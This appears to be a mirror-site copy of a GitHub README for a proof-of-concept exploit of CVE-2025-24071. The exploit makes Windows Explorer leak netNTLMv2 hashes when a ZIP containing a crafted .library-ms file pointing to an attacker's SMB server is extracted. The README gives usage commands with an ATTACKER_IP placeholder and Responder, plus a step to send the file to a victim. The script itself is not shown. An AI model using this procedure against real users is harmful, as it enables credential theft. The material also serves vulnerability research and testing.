Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-24071 PoC — Microsoft Windows File Explorer 信息泄露漏洞

Source
https://github.com/rubbxalc/CVE-2025-24071
Associated Vulnerability
Title:Microsoft Windows File Explorer 信息泄露漏洞 (CVE-2025-24071)
Description:Microsoft Windows File Explorer是美国微软(Microsoft)公司的一个文件管理器应用程序。 Microsoft Windows File Explorer存在信息泄露漏洞。攻击者利用该漏洞可以获取敏感信息。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows Server 2019,Windows Server
Readme
# CVE-2025-24071

This Python script is designed to demonstrate the **CVE-2025-24071** vulnerability in Windows Explorer. This vulnerability allows an attacker to capture **netNTLMv2** credentials from a victim without any direct interaction from the victim.

## Description

The **CVE-2025-24071** vulnerability exists in the way Windows handles `.library-ms` files inside ZIP archives. When a ZIP file containing a malicious `.library-ms` file is extracted, Windows automatically attempts to access an SMB location specified in the file, which may result in exposing the victim's credentials to the attacker's server.

This script generates a ZIP file containing a malicious `.library-ms` file. When a victim extracts the ZIP file, the system automatically tries to connect to the SMB location specified in the file, sending **netNTLMv2** credentials to the attacker without any interaction from the victim.

## How It Works

1. The script takes the **attacker's IP address** as an argument and inserts it into an XML file that defines a `.library-ms` file. This file instructs Windows to connect to a shared resource at the attacker's IP address.
   
2. The `.library-ms` file is then placed inside a ZIP file named `exploit.zip`.

3. When the victim extracts the ZIP file, Windows processes the `.library-ms` file and, due to the vulnerability, automatically establishes an SMB connection to the attacker's server.

4. The attacker can capture the **netNTLMv2** credentials using tools like **Responder**, without the victim needing to take any action.

## Requirements

- Python 3.x
- Modules: `zipfile`, `os`, `argparse`

## Usage

1. **Generate the malicious file**:

```bash
python exploit.py --ip <ATTACKER_IP>
```

2. Once the malicious file is generated, ensure that Responder is running and listening for the **netNTLMv2** hashes.

```bash
responder -I <INTERFACE>
```

3. Send the generated `exploit.zip` file to the victim. When they extract the file, Windows will attempt to connect to the SMB server specified in the `.library-ms` file.

4. Once the victim extracts the ZIP file and Windows attempts the SMB connection, **Responder** will capture the **netNTLMv2** hashes from the victim.

## Disclaimer

This script is intended for educational and testing purposes in controlled environments. The malicious use of this vulnerability may be illegal and against the laws and regulations of many countries. Use this script only on systems that you have permission to audit and always with proper authorization.
File Snapshot

 [4.0K]  /data/pocs/a859d556d51a34d116d1a0c98499ddf7a2e9d201
├── [ 947]  poc.py
└── [2.5K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.